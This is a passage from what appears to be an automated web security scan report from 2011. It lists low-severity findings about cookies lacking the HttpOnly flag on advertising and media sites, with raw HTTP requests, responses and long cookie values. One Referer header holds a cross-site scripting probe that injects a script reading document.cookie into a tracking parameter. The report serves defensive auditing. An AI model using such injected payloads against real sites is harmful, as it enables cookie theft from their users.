!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1051114&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=2c382b2c-154d-11e0-8090-001e6849f405&_hmacv=1&_salt=2076931618&_keyid=k1&_hmac=deb36388c0462f4f1745f3224a27addc34e20c73; pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#M*E!!E)$!$XwU!/uG1!%:2w!#:m1!?5%!'2gi6!xSD7!%4=%!%@78!'>cr~~~~~<jbOF<ka5`~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~"; lifb=%y_Qs7i<Qa5p0/:; ih="b!!!!7!(4vA!!!!#<kc#t!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF"; bh="b!!!#l!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:50 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b!!!#m!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(V!!!!#<jHAu!#5(X!!!!#<jLPe!#5(]!!!!#<jLPe!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#C-Y!!!!#<iC/U!#I=D!!!!#<kjhR!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!%<kc#o!#MTF!!!!%<kc#o!#MTH!!!!%<kc#o!#MTI!!!!%<kc#o!#MTJ!!!!%<kc#o!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#RY.!!!!'<kdT!!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!%<kc#o!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#]W%!!!!'<kdT!!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#^Bo!!!!'<kdT!!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<f!!!!#<jLPe!#b<g!!!!#<kI4S!#b<h!!!!#<jHAu!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b<x!!!!#<jLPe!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g[h!!!!'<kdT!!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p#b!!!!'<kdT!!#p]T!!!!$<kL2n"; path=/; expires=Tue, 29-Jan-2013 01:23:50 GMT
Cache-Control: no-store
Last-Modified: Sun, 30 Jan 2011 01:23:50 GMT
Pragma: no-cache
Content-Length: 167
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1037875620/?label=nOCpCPKW9QEQpPPy7gM&guid=ON&script=0" />');

17.83. http://add.my.yahoo.com/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rss HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.84. http://ads.asp.net/a.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.asp.net
Path:	/a.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

%24SPIDER=False; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords= HTTP/1.1
Host: ads.asp.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5zm5r4vkiruwbqz3nggspz55; path=/; HttpOnly
Set-Cookie: %24SPIDER=False; path=/
Set-Cookie: %24CC=US; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24RC=TX; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
Set-Cookie: %24MC=0; expires=Sun, 30-Jan-2011 23:22:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:21:59 GMT
Connection: close
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.infragistics.com/redirects/SLNetDec1610SL4-WPF-DC">here</a>.</h2>
</body></html>

17.85. http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.neudesicmediagroup.com
Path:	/ads/charts_1110_728x90.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/charts_1110_728x90.gif HTTP/1.1
Host: ads.neudesicmediagroup.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 30921
Content-Type: image/gif
Last-Modified: Wed, 17 Nov 2010 22:49:50 GMT
Accept-Ranges: bytes
ETag: "92e2cdbda986cb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: ARRAffinity=4d2595d3360958e1a13d6a0752f068ec43e5a9f153c5cfa82e99d6cafccefb25;Path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:08 GMT

GIF89a..Z.........M.........&I.Vs......lqqr........N.U........}.m.....M...S..Ne......~.^....0......e......................c....QQQ....Jy....G.....".......e.$..........5n.4N....d...[.f.y.>.c.111.b.....
...[SNIP]...

17.86. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.87. http://alex-johnson.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://alex-johnson.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.88. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d775684/10/38973908/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.89. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d852149/4/40142779/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sat, 30-Jan-2010 02:23:02 GMT; path=/; domain=.questionmarket.com
CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com
ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.90. http://api.bit.ly/shorten previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bit.ly
Path:	/shorten

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_xsrf=442abb1a273f4a0d80590533c0eff126; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shorten HTTP/1.1
Host: api.bit.ly
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:21:50 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 104
Allow: GET, HEAD, POST
P3P: CP="CAO PSA OUR"
Set-Cookie: _xsrf=442abb1a273f4a0d80590533c0eff126; Path=/

{"errorCode": 203, "errorMessage": "You must be authenticated to access shorten", "statusCode": "ERROR"}

17.91. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.92. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com;
BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.93. http://articles.redacted/news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://articles.redacted
Path:	/news/news.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news.aspx HTTP/1.1
Host: articles.moneycentral.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.94. http://athima-chansanchai.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
